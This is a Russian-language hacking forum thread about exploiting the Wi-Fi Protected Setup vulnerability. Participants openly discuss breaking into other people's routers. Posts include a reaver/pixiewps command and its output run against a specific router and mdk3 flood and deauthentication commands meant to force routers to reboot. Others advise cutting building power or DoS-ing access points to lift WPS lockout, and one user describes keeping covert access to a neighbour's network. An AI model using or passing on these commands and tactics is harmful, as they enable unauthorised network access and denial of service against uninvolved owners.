Уязвимость в протоколе Wi-Fi Protected Setup

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by gpuhash, 30 Dec 2011.

  1. roman921

    roman921 Member

    Joined:
    24 May 2015
    Messages:
    318
    Likes Received:
    25
    Reputations:
    0
    Вопрос был в том, как включить wps после того как роутер сам его отрубил, так что не ерунда.
     
  2. Gashek

    Gashek Well-Known Member

    Joined:
    16 Feb 2017
    Messages:
    211
    Likes Received:
    655
    Reputations:
    13
    Ты вроде не первый день здесь.
    На худой конец пользуйся поиском в "Бесроводных...", не раз твой вопрос обсуждался.
    Делается это 2-мя способами с soho девайсами:
    1) Путем отключения/включения электроэнергии в распред. щите, если это многоквартирное здание.
    В частном же домовладении, придется брать ключи у энергетика от подстанции или рубить кабель и ждать пока восстановят)
    и так каждый раз, если wps опять уйдет в lock.
    2) DoS AP, что займёт более продолжительное время, но сохранит отчасти анонимность.

    Псы...
    На счёт "ебунты/ерунды"),
    имелось в виду, что хорош "разводить кроликов"!
    Складывается впечатление по твоим старым коментариям в профиле, что ты как говорится "Не с первым поездом из Жмеринки приехал", а в последних - зачем то лопухом прикидываешься и не только в этой ветке)
     
  3. roman921

    roman921 Member

    Joined:
    24 May 2015
    Messages:
    318
    Likes Received:
    25
    Reputations:
    0
    Подробных инструкций нету как конкретно и сколько точку ддосить, чтобы она ребутнулась. мдк3 не особо прокатывает.
     
  4. quite gray

    quite gray Well-Known Member

    Joined:
    8 Dec 2016
    Messages:
    91
    Likes Received:
    419
    Reputations:
    1
    Да, это Huawei. Ушёл в lock из-под reaver`а на десятой попытке пина с параметрами -d 300 -r 2:7200.
    P.S. Не легко на свете пастушонку Пете - то овца пропала на рассвете, то лисичка спряталась в кусты :-D
     
    #4564 quite gray, 8 Apr 2019
    Last edited: 9 Apr 2019
  5. karabest

    karabest New Member

    Joined:
    22 Nov 2018
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Не найду точной информации как снять wps lock на роутерах tplink. Что нужно скачать для линукса и какие команды вводить? mdk3 не справляется. vmr-mdk 2017 k4 тоже. Один 741нд, а второй 841н
     
    #4565 karabest, 11 Apr 2019
    Last edited: 11 Apr 2019
  6. TOX1C

    TOX1C Elder - Старейшина

    Joined:
    24 Mar 2012
    Messages:
    875
    Likes Received:
    1,256
    Reputations:
    17
    Снять галочку отсюда
    [​IMG]
    и никак иначе.
     
  7. wlk2

    wlk2 New Member

    Joined:
    9 Apr 2019
    Messages:
    32
    Likes Received:
    2
    Reputations:
    0
    В файле есть последовательности пинов в 5 и 7 знаков. Это не ошибка?
     
  8. grum

    grum Member

    Joined:
    15 Jun 2018
    Messages:
    21
    Likes Received:
    6
    Reputations:
    0
    Moгy пoдeлитьcя cвoим oпытoм кacaтeльнo oбcyждeния Netis WF2411R c 225-й cтp.: былa вcкpытaя тoчкa. Чepeз нeк. вpeмя xoзяeвa пoмeняли мapшpyтизaтop нa Netis WF2419R. У нeгo (a мoжeт y вcex Netis'oв) пo yмoлчaнию WPS выключeн, нo пapoль ocтaвили пpeжний, блaгoдapя чeмy дocтyп coxpaнилcя. Я пoдyмaл чтo нeплoxo бы пoдcтpaxoвaтьcя нa cлyчaй cмeны пapoля и вкл. WPS.
    И тaк, вcё вpoдe былo xopoшo, пoкa вдpyг, чepeз пapy мecяцeв мнe нe зaxoтeлocь пpopeпeтиpoвaть пoлyчeниe нoвoгo пapoля. Я oчeнь yдивилcя, пoлyчив:
    . . .
    [*] Sending WPS Message M4...
    [*] Received WSC NACK.
    [-] Error: Wrong PIN code.
    вeдь pin был тoчнo пpaвильный, взятый из нacтpoeк мapшpyтизaтopa. Cтaлo яcнo чтo WPS пpocтo нepaбoчий. B итoгe я oбнoвил пpoшивкy и WPS зapaбoтaл.
    Дyмaю чтo y тoгo WF2411R тaжe фигня – кpивaя пpoшивкa, пoтoмy чтo y этoгo WF2419R нa кpивoй пpoшивкe тoжe E-Hash1 былo = E-Hash2, xoтя pin был нe пустoй и c paзными половинкaми.
     
    TOX1C likes this.
  9. TOX1C

    TOX1C Elder - Старейшина

    Joined:
    24 Mar 2012
    Messages:
    875
    Likes Received:
    1,256
    Reputations:
    17
    На старых tenda был обыкновенный 24bit pin. Потом алгоритм заменили, но заменили на что? 24bit со сдвигом?
    [​IMG]
    [​IMG]
     
  10. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,242
    Likes Received:
    8,382
    Reputations:
    111
    На 24-bit вообще совсем не похоже, слишком разница между пинами большая.

    Если есть желание, пореверси прошивки. :)
    Tenda Realtek Router, firmware: V12.01.01.36_multi
    Tenda Realtek Router, firmware: V12.01.01.28_multi
     
    TOX1C and Payer like this.
  11. Felis-Sapiens

    Felis-Sapiens Reservists Of Antichat

    Joined:
    21 Jul 2015
    Messages:
    598
    Likes Received:
    3,541
    Reputations:
    154
    binarymaster, TOX1C and Payer like this.
  12. roman921

    roman921 Member

    Joined:
    24 May 2015
    Messages:
    318
    Likes Received:
    25
    Reputations:
    0
    Подскажите для YOTA 30:45:96:DD:63:15 этого мака пихиевпс уязвимость выдаст пин ? Можете подсказать дефолтные для него попробовать.
     
  13. V777

    V777 Well-Known Member

    Joined:
    12 May 2015
    Messages:
    1,063
    Likes Received:
    1,962
    Reputations:
    19
    А почему бы тебе самому не попробовать ?.. Скачай роутерскан (он работает под виндовс , ну может не знаєшь ) он с пихивпс прекрасно работает и дефолтные пароли тебе скажет .
     
    binarymaster likes this.
  14. roman921

    roman921 Member

    Joined:
    24 May 2015
    Messages:
    318
    Likes Received:
    25
    Reputations:
    0
    Попробовал, он отключил впс) Хотелось заранее знать, тут вроде где-то был список уязвимых моделей.
    Мне нужно на роутер портативный, винда не катит)
     
  15. roman921

    roman921 Member

    Joined:
    24 May 2015
    Messages:
    318
    Likes Received:
    25
    Reputations:
    0
    Подскажите можно ли тут пин вытянуть.
    root@GL-AR300M:~# reaver -i wlan0mon -b E4:18:6B:58:11:22 -c 6 -vv -K -L

    Reaver v1.6.5 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

    [+] Switching wlan0mon to channel 6
    [+] Waiting for beacon from E4:18:6B:58:11:22
    [+] Received beacon from E4:18:6B:58:11:22
    [+] Vendor: RalinkTe
    [+] Trying pin "12345670"
    [+] Sending authentication request
    [+] Sending association request
    [+] Associated with E4:18:6B:58:11:22 (ESSID: TPSET)
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    executing pixiewps -e 1953f1b1e9e2f6f42b7e1288f2110460b172c264b5405ec0cb05bd96b049c89db8340ec31a0c79e0c9d25cb8803d1481777ebd106c212c59538a3fc24b5c93e5f7daecf36f537487e4cf9c2c433f5e0577741b94a3b79c6dbd80b0480c02ac11191c580ab9ede5b8258f640e00554d76a1ffde33c25a4726130db6a08742a6907c56a3e54e8d62ef75ee54c059bee65d369b45d75e119a846127b9f048d13b15648a1d07533de13ad551feb7475244a4da2c40bf2c18664325e2eaa11da9c0a9 -s a73abded9d2c6a3e659a46f266cad75418b48c212cbe6272277c64dd27de8cdf -z aa0c02e6477013dceb07342926dcb64aec9951cacaef3aa682a31802be23c213 -a adee9e6431d7d6321e6ac46c211b10bced65d8305f86fe0f6c18bdc421fa2e2e -n fc5529b2566da8915544eb87a289647e -r 161921cccc9ceeb2d606c12aa0da504881fd58f25bddc16397a96a3b817713cebadfac2bc433123c8b866eedd6b00909ef6a2fea3179157a2e512a7eb8e87922b150e630b73018f236579243c8bfb343efaa4fdfb57310d680ca329f3eaf7df0967b4ba132ba8d87992cd9a05498ee39097e3113c55de183d95caf2e37a31bd36cbd603dcab7d45ad95d86ecd418b456cf227e233503df5d04c92bd9820848c9c565d1a57fc60679d42b22f55c1d488f66e441e3140f837d3dd7c61db5880da4

    Pixiewps 1.4

    [-] WPS pin not found!

    [*] Time taken: 8 s 772 ms

    [@] Looks like you have some interesting data! Please consider contributing with your data to improve pixiewps. Follow the instructions on http://0x0.st/tm - Thank you!

    По ссылке только предлагают 1.6.3 ривер попробовать, но пост двухлетней давности там.
     
  16. TOX1C

    TOX1C Elder - Старейшина

    Joined:
    24 Mar 2012
    Messages:
    875
    Likes Received:
    1,256
    Reputations:
    17
    Нет, нельзя. Это zyxel keenetik, у них в прошивке исправлена уязвимость в криптографии, дающая возможность узнать pin. Так же ведут себя роутеры technicolor.
     
  17. roman921

    roman921 Member

    Joined:
    24 May 2015
    Messages:
    318
    Likes Received:
    25
    Reputations:
    0
    После 10 попыток вроде залочился, пробовал mdk3 параллельно атаки
    mdk3 wlan0mon a -a mac -m
    mdk3 wlan0mon g -t mac
    mdk3 wlan0mon x 0 -t mac -n ssid
    mdk3 wlan0mon d -c 6
    Подержал пару минут, не ребутится, с тп-линками такое прокатывает.
    Этих можно как-то через mdk3 ребутнуть ?
     
Loading...